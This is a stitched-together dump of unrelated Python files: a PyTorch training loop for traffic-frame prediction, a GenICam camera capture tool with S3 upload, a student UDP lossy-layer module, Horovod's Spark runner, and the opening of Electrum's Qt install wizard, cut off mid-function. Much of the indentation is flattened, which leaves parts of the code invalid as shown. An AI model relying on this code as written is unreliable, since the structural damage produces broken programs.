print('Loading ', initial_checkpoint)
state_dict = torch.load(initial_checkpoint, map_location=lambda storage, loc: storage)
net.load_state_dict(state_dict, strict=True)
optimizer_state_dict_ = torch.load(initial_checkpoint_optimizer, map_location=lambda storage, loc: storage)
optimizer_state_dict = optimizer_state_dict_['optimizer']
optimizer.load_state_dict(optimizer_state_dict)
train_data_filepath_list, val_data_filepath_list = get_data_filepath_list_by_year(input_train_data_folder_path)
train_set = []
for i in range(len(train_data_filepath_list)):
for j in range(num_sequence_per_day):
train_set.append( (i,j) )
num_iteration_per_epoch = int(len(train_set) / batch_size)
print('num_iteration_per_epoch:', num_iteration_per_epoch)
assert num_iteration_per_epoch > 10
val_set = []
val_skip_k = 0
val_skip_ratio = 5
for i in range(len(val_data_filepath_list)):
for j in range(0, num_sequence_per_day, num_frame_sequence):
val_skip_k += 1
if val_skip_k % val_skip_ratio == 0:
val_set.append( (i,j) )
num_val_iteration_per_epoch = int(len(val_set) / batch_size_val)
print('num_val_iteration_per_epoch:', num_val_iteration_per_epoch)
    # load the per-city static map once and normalise to [0, 1]
    with h5py.File(input_static_data_path, 'r') as fr:
        a_group_key = list(fr.keys())[0]
        static_data = np.asarray(fr[a_group_key], np.uint8)
    static_data = static_data[np.newaxis, :, :, :].astype(np.float32) / 255.0
train_input_queue = queue.Queue()
train_output_queue = queue.Queue()
def load_train_multithread():
    while True:
        # wait if no work has been queued yet, or if enough batches are already buffered
        if train_input_queue.empty() or train_output_queue.qsize() > 8:
            time.sleep(0.1)
            continue
i_j_list = train_input_queue.get()
        train_data_batch_list = []
        for train_i_j in i_j_list:
            (i, j) = train_i_j
            file_path = train_data_filepath_list[i]
            # close the HDF5 handle per file; the slice below copies into memory
            with h5py.File(file_path, 'r') as fr:
                a_group_key = list(fr.keys())[0]
                data = fr[a_group_key]
                train_data_batch_list.append(data[j:j+num_frame_sequence, :, :, :][np.newaxis, :, :, :, :])
        train_data_batch = np.concatenate(train_data_batch_list, axis=0)  # (B, num_frame_sequence, H, W, C)
        # first 12 frames are the input; of the following 12, keep offsets
        # 0,1,2,5,8,11 (5/10/15/30/45/60 minutes ahead at 5-minute frames)
        input_data = train_data_batch[:, :num_frame_before, :, :, :]
        orig_label = train_data_batch[:, num_frame_before:, :, :, :num_channel_out]
        true_label = np.concatenate((orig_label[:, 0:3, :, :, :], orig_label[:, 5::3, :, :, :]), axis=1)
        input_data = input_data.astype(np.float32) / 255.0
        true_label = true_label.astype(np.float32) / 255.0
        # fold the frame axis into channels: (B, frames*channels, H, W)
        input_data = np.moveaxis(input_data, -1, 2).reshape((batch_size, -1, height, width))
        true_label = np.moveaxis(true_label, -1, 2).reshape((batch_size, -1, height, width))
        # append the static city map as extra input channels
        input_data = np.concatenate((input_data, np.repeat(static_data, batch_size, axis=0)), axis=1)
train_output_queue.put( (input_data, true_label) )
    assert num_thread > 0
    for i in range(num_thread):
        t = threading.Thread(target=load_train_multithread)
        t.daemon = True  # loader threads run forever; don't block interpreter exit
        t.start()
net.train()
sum_train_loss = 0.0
sum_train_iter = 0
global_step = global_step_start
for epoch in range(num_epoch_to_train):
np.random.shuffle(train_set)
for a in range(num_iteration_per_epoch):
i_j_list = []
for train_i_j in train_set[a * batch_size : (a+1) * batch_size]:
i_j_list.append(train_i_j)
train_input_queue.put(i_j_list)
for a in range(num_iteration_per_epoch):
if global_step % save_per_iteration == 0:
net.eval()
state_dict_0 = copy.deepcopy(net.state_dict())
torch.save(state_dict_0, out_dir + '/%09d_model.pth' % (global_step))
torch.save(
{
'optimizer': optimizer.state_dict(),
'global_step': global_step,
'epoch': epoch,
},
out_dir + '/%09d_optimizer.pth' % (global_step))
                eval_loss_list = []
with torch.no_grad():
                    for b in range(num_val_iteration_per_epoch):
                        val_data_batch_list = []
                        for i_j in val_set[b * batch_size_val : (b+1) * batch_size_val]:
                            (i, j) = i_j
                            file_path = val_data_filepath_list[i]
                            with h5py.File(file_path, 'r') as fr:
                                a_group_key = list(fr.keys())[0]
                                data = fr[a_group_key]
                                val_data_batch_list.append(data[j:j+num_frame_sequence, :, :, :][np.newaxis, :, :, :, :])
val_data_batch = np.concatenate(val_data_batch_list, axis=0)
input_data = val_data_batch[:,:num_frame_before ,:,:,:]
orig_label = val_data_batch[:, num_frame_before:,:,:,:num_channel_out]
true_label = np.concatenate((orig_label[:, 0:3, :,:,:], orig_label[:, 5::3,:,:,:]), axis=1)
input_data = input_data.astype(np.float32)
true_label = true_label.astype(np.float32)
input_data = input_data / 255.0
true_label = true_label / 255.0
input_data = np.moveaxis(input_data, -1, 2).reshape((batch_size_val, -1, height, width))
true_label = np.moveaxis(true_label, -1, 2).reshape((batch_size_val, -1, height, width))
input_data = np.concatenate((input_data,np.repeat(static_data, batch_size_val, axis=0)), axis=1)
input = torch.from_numpy(input_data).float().cuda()
target = torch.from_numpy(true_label).float().cuda()
prediction = net(input)
loss = loss_func2(prediction, target)
eval_loss_list.append(loss.item())
                avg_train_loss = sum_train_loss / (float(sum_train_iter) + EPS)
                avg_eval_loss = float(np.mean(eval_loss_list)) if eval_loss_list else 0.0
                sum_train_loss = 0.0
                sum_train_iter = 0
                print('global_step:', global_step, '\t', 'epoch:', epoch,
                      '\t', 'train_loss:', avg_train_loss,
                      '\t', 'eval_loss:', avg_eval_loss,
                      '\t', datetime.now())
                with open('res.txt', 'a') as debug_out:
                    debug_out.write('%d\t%.8f\t%.8f\n' % (global_step, avg_train_loss, avg_eval_loss))
net.train()
            # Queue.get() blocks until a loader thread has prepared a batch
            (input_data, true_label) = train_output_queue.get()
optimizer.zero_grad()
input = torch.from_numpy(input_data).float().cuda()
target = torch.from_numpy(true_label).float().cuda()
prediction = net(input)
loss = loss_func2(prediction, target)
sum_train_iter += 1
sum_train_loss += loss.item()
loss.backward()
optimizer.step()
global_step += 1
|
capture.py
|
import os
import time
import threading
import queue
from absl import app, flags
import cv2
from genicam.gentl import TimeoutException
from harvesters.core import Harvester
import numpy as np
import s3_util
WINDOW_NAME = "Capture"
flags.DEFINE_string(
"gentl_producer_path",
"/opt/mvIMPACT_Acquire/lib/x86_64/mvGenTLProducer.cti",
"Path to the GenTL producer .cti file to use.",
)
flags.DEFINE_integer(
"display_width", 1080, "Target image width for the display window.",
)
flags.DEFINE_integer("frame_rate", 30, "Frame rate to acquire images at.")
flags.DEFINE_string("image_dir", "../images", "The directory to save images to.")
flags.DEFINE_string("image_file_type", "jpg", "File type to save images as.")
flags.DEFINE_string("s3_bucket_name", None, "S3 bucket to send images to.")
flags.DEFINE_string("s3_image_dir", "data/images", "Prefix of the s3 image objects.")
class RGB8Image:
BORDER_COLOR = (3, 252, 53)
BORDER_WIDTH = 10
def __init__(
self, width: int, height: int, data_format: str, image_data: np.ndarray
):
self.image_data: np.ndarray = self._process_image(
image_data, data_format, width, height
)
def get_height(self):
return self.image_data.shape[0]
def get_width(self):
return self.image_data.shape[1]
def get_channels(self):
if len(self.image_data.shape) < 3:
return 1
return self.image_data.shape[2]
def get_data(self) -> np.ndarray:
return self.image_data
def _process_image(self, image_data, data_format, width, height) -> np.ndarray:
if data_format == "Mono8":
return cv2.cvtColor(image_data.reshape(height, width), cv2.COLOR_GRAY2RGB)
elif data_format == "BayerRG8":
return cv2.cvtColor(
image_data.reshape(height, width), cv2.COLOR_BayerRG2RGB
)
elif data_format == "BayerGR8":
return cv2.cvtColor(
image_data.reshape(height, width), cv2.COLOR_BayerGR2RGB
)
elif data_format == "BayerGB8":
return cv2.cvtColor(
image_data.reshape(height, width), cv2.COLOR_BayerGB2RGB
)
elif data_format == "BayerBG8":
return cv2.cvtColor(
image_data.reshape(height, width), cv2.COLOR_BayerBG2RGB
)
elif data_format == "RGB8":
return image_data.reshape(height, width, 3)
elif data_format == "BGR8":
return cv2.cvtColor(image_data.reshape(height, width, 3), cv2.COLOR_BGR2RGB)
else:
print("Unsupported pixel format: %s" % data_format)
raise ValueError("Unsupported pixel format: %s" % data_format)
def get_resized_image(self, target_width: int) -> np.ndarray:
resize_ratio = float(target_width / self.get_width())
return cv2.resize(self.image_data, (0, 0), fx=resize_ratio, fy=resize_ratio)
def get_highlighted_image(self, target_width: int = None) -> np.ndarray:
return cv2.copyMakeBorder(
(
self.get_resized_image(target_width)
if target_width is not None
else self.get_data()
)[
self.BORDER_WIDTH : -self.BORDER_WIDTH,
self.BORDER_WIDTH : -self.BORDER_WIDTH,
],
top=self.BORDER_WIDTH,
bottom=self.BORDER_WIDTH,
left=self.BORDER_WIDTH,
right=self.BORDER_WIDTH,
borderType=cv2.BORDER_ISOLATED,
value=self.BORDER_COLOR,
)
    def save(self, file_path: str) -> bool:
        # cv2.imwrite signals failure via its return value rather than raising
        return bool(cv2.imwrite(file_path, self.get_data()))
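# A minimal construction sketch (synthetic 4x4 Mono8 frame; real frames come
# from the GenTL buffer in get_newest_image below):
#   raw = np.zeros(4 * 4, dtype=np.uint8)
#   img = RGB8Image(4, 4, "Mono8", raw)
#   assert img.get_channels() == 3  # Mono8 is expanded to RGB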
def get_newest_image(cam):
try:
retrieved_image = None
with cam.fetch_buffer() as buffer:
component = buffer.payload.components[0]
retrieved_image = RGB8Image(
component.width,
component.height,
component.data_format,
component.data.copy(),
)
return retrieved_image
except TimeoutException:
print("Timeout ocurred waiting for image.")
return None
except ValueError as err:
print(err)
return None
def acquire_images(cam, save_queue: queue.Queue) -> None:
cv2.namedWindow(WINDOW_NAME)
cv2.moveWindow(WINDOW_NAME, 0, 0)
try:
cam.start_image_acquisition()
print("Acquisition started.")
while True:
retrieved_image = get_newest_image(cam)
if retrieved_image is None:
break
cv2.imshow(
WINDOW_NAME,
retrieved_image.get_resized_image(flags.FLAGS.display_width),
)
keypress = cv2.waitKey(1)
if keypress == 27:
# escape key pressed
break
elif cv2.getWindowProperty(WINDOW_NAME, cv2.WND_PROP_VISIBLE) < 1:
# x button clicked
break
elif keypress == 13:
# Enter key pressed
cv2.imshow(
WINDOW_NAME,
retrieved_image.get_highlighted_image(flags.FLAGS.display_width),
)
save_queue.put(retrieved_image)
cv2.waitKey(500)
finally:
save_queue.put(None)
cv2.destroyWindow(WINDOW_NAME)
cam.stop_image_acquisition()
print("Acquisition Ended.")
def save_images(save_queue: queue.Queue, use_s3: bool) -> None:
try:
while True:
image = save_queue.get(block=True)
if image is None:
break
file_path = os.path.join(
flags.FLAGS.image_dir,
"%i.%s" % (time.time(), flags.FLAGS.image_file_type),
)
            save_successful = image.save(file_path)
            if save_successful:
                print("Image saved at: %s" % file_path)
            if use_s3 and save_successful:
s3_util.upload_files(
flags.FLAGS.s3_bucket_name, [file_path], flags.FLAGS.s3_image_dir,
)
finally:
print("Saving complete.")
def apply_camera_settings(cam) -> None:
# Configure newest only buffer handling
cam.keep_latest = True
cam.num_filled_buffers_to_hold = 1
# Configure frame rate
cam.remote_device.node_map.AcquisitionFrameRateEnable.value = True
cam.remote_device.node_map.AcquisitionFrameRate.value = min(
flags.FLAGS.frame_rate, cam.remote_device.node_map.AcquisitionFrameRate.max
)
print(
"Acquisition frame rate set to: %3.1f"
% cam.remote_device.node_map.AcquisitionFrameRate.value
)
def create_output_dir(dir_name) -> bool:
    if not os.path.isdir(dir_name):
print("Creating output directory: %s" % dir_name)
try:
os.makedirs(dir_name)
except OSError:
print("Creation of the directory %s failed" % dir_name)
return False
else:
print("Successfully created the directory %s " % dir_name)
return True
else:
print("Output directory exists.")
return True
def main(unused_argv):
if not create_output_dir(flags.FLAGS.image_dir):
print("Cannot create output annotations directory.")
return
    use_s3 = flags.FLAGS.s3_bucket_name is not None
if use_s3:
if not s3_util.s3_bucket_exists(flags.FLAGS.s3_bucket_name):
use_s3 = False
print(
"Bucket: %s either does not exist or you do not have access to it"
% flags.FLAGS.s3_bucket_name
)
else:
print(
"Bucket: %s exists and you have access to it"
% flags.FLAGS.s3_bucket_name
)
h = Harvester()
h.add_cti_file(flags.FLAGS.gentl_producer_path)
if len(h.cti_files) == 0:
print("No valid cti file found at %s" % flags.FLAGS.gentl_producer_path)
h.reset()
return
print("Currently available genTL Producer CTI files: ", h.cti_files)
h.update_device_info_list()
if len(h.device_info_list) == 0:
print("No compatible devices detected.")
h.reset()
return
print("Available devices List: ", h.device_info_list)
print("Using device: ", h.device_info_list[0])
cam = h.create_image_acquirer(list_index=0)
apply_camera_settings(cam)
save_queue = queue.Queue()
save_thread = threading.Thread(target=save_images, args=(save_queue, use_s3,))
save_thread.start()
acquire_images(cam, save_queue)
save_thread.join()
# clean up
cam.destroy()
h.reset()
print("Exiting.")
if __name__ == "__main__":
app.run(main)
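# Example invocation (hypothetical bucket name):
#   python capture.py --s3_bucket_name=my-images-bucket --frame_rate=15
# In the capture window, Enter saves the current frame and Esc quits.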
|
lossy_layer.py
|
# ------------------------
# Tom Aarsen - s1027401
# Bart Janssen - s4630270
# ------------------------
import socket, select, threading
from btcp.constants import *
from btcp.btcp_segment import BTCPSegment
# Continuously read from the socket and whenever a segment arrives,
# call the lossy_layer_input method of the associated socket.
# When flagged, return from the function.
def handle_incoming_segments(bTCP_sock, event, udp_sock):
while not event.is_set():
# We do not block here, because we might never check the loop condition in that case
rlist, wlist, elist = select.select([udp_sock], [], [], 1)
if rlist:
segment = udp_sock.recvfrom(SEGMENT_SIZE)
bTCP_sock.lossy_layer_input(segment)
# The lossy layer emulates the network layer in that it provides bTCP with
# an unreliable segment delivery service between a and b. When the lossy layer is created,
# a thread is started that calls handle_incoming_segments.
class LossyLayer:
def __init__(self, bTCP_sock, a_ip, a_port, b_ip, b_port):
self._bTCP_sock = bTCP_sock
self._b_ip = b_ip
self._b_port = b_port
self._udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._udp_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._udp_sock.bind((a_ip, a_port))
self._event = threading.Event()
self._thread = threading.Thread(target=handle_incoming_segments, args=(self._bTCP_sock, self._event, self._udp_sock))
self._thread.start()
# Flag the thread that it can stop and close the socket.
def destroy(self):
self._event.set()
self._thread.join()
self._udp_sock.close()
# Put the segment into the network
def send_segment(self, segment):
self._udp_sock.sendto(segment, (self._b_ip, self._b_port))
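# A minimal usage sketch (hypothetical ports; the bTCP socket classes in this
# assignment construct their own LossyLayer):
#   layer = LossyLayer(my_btcp_socket, "localhost", 20000, "localhost", 30000)
#   layer.send_segment(packed_segment_bytes)
#   layer.destroy()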
|
__init__.py
|
# Copyright 2019 Uber Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# Workaround for https://issues.apache.org/jira/browse/SPARK-22674
# This fix also requires the user to make this same change at the top of their
# training script before importing pyspark (on serialization).
import collections
collections.namedtuple.__hijack = 1
import os
import pyspark
from six.moves import queue
import sys
import threading
from horovod.spark.task import task_service
from horovod.run.common.util import codec, env as env_util, safe_shell_exec, \
timeout, host_hash, secret
from horovod.run.common.util import settings as hvd_settings
from horovod.run.mpi_run import mpi_run
from horovod.spark.driver import driver_service, job_id
def _task_fn(index, driver_addresses, settings):
task = task_service.SparkTaskService(index, settings.key, settings.nic)
try:
driver_client = driver_service.SparkDriverClient(driver_addresses, settings.key, settings.verbose)
driver_client.register_task(index, task.addresses(), host_hash.host_hash())
task.wait_for_initial_registration(settings.timeout)
# Tasks ping each other in a circular fashion to determine interfaces reachable within
# the cluster.
next_task_index = (index + 1) % settings.num_proc
next_task_addresses = driver_client.all_task_addresses(next_task_index)
# We request interface matching to weed out all the NAT'ed interfaces.
next_task_client = \
task_service.SparkTaskClient(next_task_index, next_task_addresses,
settings.key, settings.verbose,
match_intf=True)
driver_client.register_task_to_task_addresses(next_task_index, next_task_client.addresses())
task_indices_on_this_host = driver_client.task_host_hash_indices(
host_hash.host_hash())
if task_indices_on_this_host[0] == index:
# Task with first index will execute orted that will run mpirun_exec_fn for all tasks.
task.wait_for_command_start(settings.timeout)
task.wait_for_command_termination()
else:
# The rest of tasks need to wait for the first task to finish.
first_task_addresses = driver_client.all_task_addresses(task_indices_on_this_host[0])
first_task_client = \
task_service.SparkTaskClient(task_indices_on_this_host[0],
first_task_addresses, settings.key,
settings.verbose)
first_task_client.wait_for_command_termination()
return task.fn_result()
finally:
task.shutdown()
def _make_mapper(driver_addresses, settings):
def _mapper(index, _):
yield _task_fn(index, driver_addresses, settings)
return _mapper
def _make_spark_thread(spark_context, spark_job_group, driver, result_queue,
settings):
def run_spark():
try:
spark_context.setJobGroup(spark_job_group,
"Horovod Spark Run",
interruptOnCancel=True)
procs = spark_context.range(0, numSlices=settings.num_proc)
# We assume that folks caring about security will enable Spark RPC
# encryption, thus ensuring that key that is passed here remains
# secret.
result = procs.mapPartitionsWithIndex(_make_mapper(driver.addresses(), settings)).collect()
result_queue.put(result)
except:
driver.notify_spark_job_failed()
raise
spark_thread = threading.Thread(target=run_spark)
spark_thread.start()
return spark_thread
def run(fn, args=(), kwargs={}, num_proc=None, start_timeout=None, extra_mpi_args=None, env=None,
stdout=None, stderr=None, verbose=1, nic=None, run_func=safe_shell_exec.execute):
"""
Runs Horovod in Spark. Runs `num_proc` processes executing `fn` using the same amount of Spark tasks.
Args:
fn: Function to run.
args: Arguments to pass to `fn`.
kwargs: Keyword arguments to pass to `fn`.
num_proc: Number of Horovod processes. Defaults to `spark.default.parallelism`.
start_timeout: Timeout for Spark tasks to spawn, register and start running the code, in seconds.
If not set, falls back to `HOROVOD_SPARK_START_TIMEOUT` environment variable value.
If it is not set as well, defaults to 600 seconds.
extra_mpi_args: Extra arguments for mpi_run. Defaults to no extra args.
env: Environment dictionary to use in Horovod run. Defaults to `os.environ`.
stdout: Horovod stdout is redirected to this stream. Defaults to sys.stdout.
stderr: Horovod stderr is redirected to this stream. Defaults to sys.stderr.
verbose: Debug output verbosity (0-2). Defaults to 1.
nic: specify the NIC for tcp network communication.
run_func: Run function to use. Must have arguments 'command', 'env', 'stdout', 'stderr'.
Defaults to safe_shell_exec.execute.
Returns:
List of results returned by running `fn` on each rank.
"""
if start_timeout is None:
# Lookup default timeout from the environment variable.
start_timeout = int(os.getenv('HOROVOD_SPARK_START_TIMEOUT', '600'))
tmout = timeout.Timeout(start_timeout,
message='Timed out waiting for {activity}. Please check that you have '
'enough resources to run all Horovod processes. Each Horovod '
'process runs in a Spark task. You may need to increase the '
'start_timeout parameter to a larger value if your Spark resources '
'are allocated on-demand.')
settings = hvd_settings.Settings(verbose=verbose,
extra_mpi_args=extra_mpi_args,
key=secret.make_secret_key(),
timeout=tmout,
nic=nic,
run_func_mode=True)
spark_context = pyspark.SparkContext._active_spark_context
if spark_context is None:
raise Exception('Could not find an active SparkContext, are you '
'running in a PySpark session?')
if num_proc is None:
num_proc = spark_context.defaultParallelism
if settings.verbose >= 1:
print('Running %d processes (inferred from spark.default.parallelism)...' % num_proc)
else:
if settings.verbose >= 1:
print('Running %d processes...' % num_proc)
settings.num_proc = num_proc
result_queue = queue.Queue(1)
spark_job_group = 'horovod.spark.run.%d' % job_id.next_job_id()
driver = driver_service.SparkDriverService(settings.num_proc, fn, args, kwargs,
settings.key, settings.nic)
spark_thread = _make_spark_thread(spark_context, spark_job_group, driver,
result_queue, settings)
try:
driver.wait_for_initial_registration(settings.timeout)
if settings.verbose >= 2:
print('Initial Spark task registration is complete.')
task_clients = [
task_service.SparkTaskClient(index,
driver.task_addresses_for_driver(index),
settings.key, settings.verbose)
for index in range(settings.num_proc)]
for task_client in task_clients:
task_client.notify_initial_registration_complete()
driver.wait_for_task_to_task_address_updates(settings.timeout)
if settings.verbose >= 2:
print('Spark task-to-task address registration is complete.')
# Determine a set of common interfaces for task-to-task communication.
common_intfs = set(driver.task_addresses_for_tasks(0).keys())
for index in range(1, settings.num_proc):
common_intfs.intersection_update(driver.task_addresses_for_tasks(index).keys())
if not common_intfs:
raise Exception('Unable to find a set of common task-to-task communication interfaces: %s'
% [(index, driver.task_addresses_for_tasks(index)) for index in range(settings.num_proc)])
# Determine the index grouping based on host hashes.
# Barrel shift until index 0 is in the first host.
host_hashes = list(driver.task_host_hash_indices().keys())
host_hashes.sort()
while 0 not in driver.task_host_hash_indices()[host_hashes[0]]:
host_hashes = host_hashes[1:] + host_hashes[:1]
settings.hosts = ','.join('%s:%d' % (host_hash, len(driver.task_host_hash_indices()[host_hash]))
for host_hash in host_hashes)
ranks_to_indices = []
for host_hash in host_hashes:
ranks_to_indices += driver.task_host_hash_indices()[host_hash]
driver.set_ranks_to_indices(ranks_to_indices)
if env is None:
env = os.environ.copy()
# Pass secret key through the environment variables.
env[secret.HOROVOD_SECRET_KEY] = codec.dumps_base64(settings.key)
rsh_agent = (sys.executable,
'-m', 'horovod.spark.driver.mpirun_rsh',
codec.dumps_base64(driver.addresses()),
codec.dumps_base64(settings))
settings.extra_mpi_args = ('{extra_mpi_args} -x NCCL_DEBUG=INFO -mca plm_rsh_agent "{rsh_agent}"'
.format(extra_mpi_args=settings.extra_mpi_args if settings.extra_mpi_args else '',
rsh_agent=' '.join(rsh_agent)))
command = (sys.executable,
'-m', 'horovod.spark.task.mpirun_exec_fn',
codec.dumps_base64(driver.addresses()),
codec.dumps_base64(settings))
mpi_run(settings, common_intfs, env, command, stdout=stdout, stderr=stderr, run_func=run_func)
except:
# Terminate Spark job.
spark_context.cancelJobGroup(spark_job_group)
# Re-raise exception.
raise
finally:
spark_thread.join()
driver.shutdown()
# Make sure Spark Job did not fail.
driver.check_for_spark_job_failure()
# If there's no exception, execution results are in this queue.
results = result_queue.get_nowait()
return [results[index] for index in ranks_to_indices]
|
installwizard.py
|
# Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import json
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional, TYPE_CHECKING
from functools import partial
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea, QApplication)
from electrum.wallet import Wallet, Abstract_Wallet
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.util import UserCancelled, InvalidPassword, WalletFileException, get_new_wallet_name
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack, ReRunDialog
from electrum.network import Network
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton, char_width_in_lineedit, PasswordLineEdit)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from .bip39_recovery_dialog import Bip39RecoveryDialog
from electrum.plugin import run_hook, Plugins
if TYPE_CHECKING:
from electrum.simple_config import SimpleConfig
from electrum.wallet_db import WalletDB
from . import ElectrumGui
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' +
'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' +
'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...')
# note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
        # Qt pie angles are specified in 1/16ths of a degree
        for i in range(self.n):
            alpha = int(16 * 360 * i / self.n)
            alpha2 = int(16 * 360 * 1 / self.n)
            qp.setBrush(Qt.green if i < self.m else Qt.gray)
            qp.drawPie(self.R, alpha, alpha2)
qp.end()
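# A minimal sketch (inside a running QApplication; hypothetical values):
#   cw = CosignWidget(2, 3)  # draws a 2-of-3 pie, two wedges green
#   cw.show()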
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0] # type: InstallWizard
while True:
#wizard.logger.debug(f"dialog stack. len: {len(wizard._stack)}. stack: {wizard._stack}")
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
# current dialog
try:
out = func(*args, **kwargs)
if type(out) is not tuple:
out = (out,)
except GoBack:
if not wizard.can_go_back():
wizard.close()
# to go back from the current dialog, we just let the caller unroll the stack:
raise
# next dialog
try:
while True:
try:
run_next(*out)
except ReRunDialog:
# restore state, and then let the loop re-run next
wizard.go_back(rerun_previous=False)
else:
break
except GoBack as e:
# to go back from the next dialog, we ask the wizard to restore state
wizard.go_back(rerun_previous=False)
# and we re-run the current dialog
if wizard.can_go_back():
# also rerun any calculations that might have populated the inputs to the current dialog,
# by going back to just after the *previous* dialog finished
raise ReRunDialog() from e
else:
continue
else:
break
return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config: 'SimpleConfig', app: QApplication, plugins: 'Plugins', *, gui_object: 'ElectrumGui'):
QDialog.__init__(self, None)
BaseWizard.__init__(self, config, plugins)
self.setWindowTitle('Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
self.gui_thread = gui_object.gui_thread
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon('electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
name_e = QLineEdit()
hbox.addWidget(name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
msg_label = WWLabel('')
vbox.addWidget(msg_label)
hbox2 = QHBoxLayout()
pw_e = PasswordLineEdit('', self)
pw_e.setFixedWidth(17 * char_width_in_lineedit())
pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(pw_label)
hbox2.addWidget(pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
vbox.addSpacing(50)
vbox_create_new = QVBoxLayout()
vbox_create_new.addWidget(QLabel(_('Alternatively') + ':'), alignment=Qt.AlignLeft)
button_create_new = QPushButton(_('Create New Wallet'))
button_create_new.setMinimumWidth(120)
vbox_create_new.addWidget(button_create_new, alignment=Qt.AlignLeft)
widget_create_new = QWidget()
widget_create_new.setLayout(vbox_create_new)
vbox_create_new.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(widget_create_new)
self.set_layout(vbox, title=_('Electrum wallet'))
temp_storage = None # type: Optional[WalletStorage]
wallet_folder = os.path.dirname(path)
def on_choose():
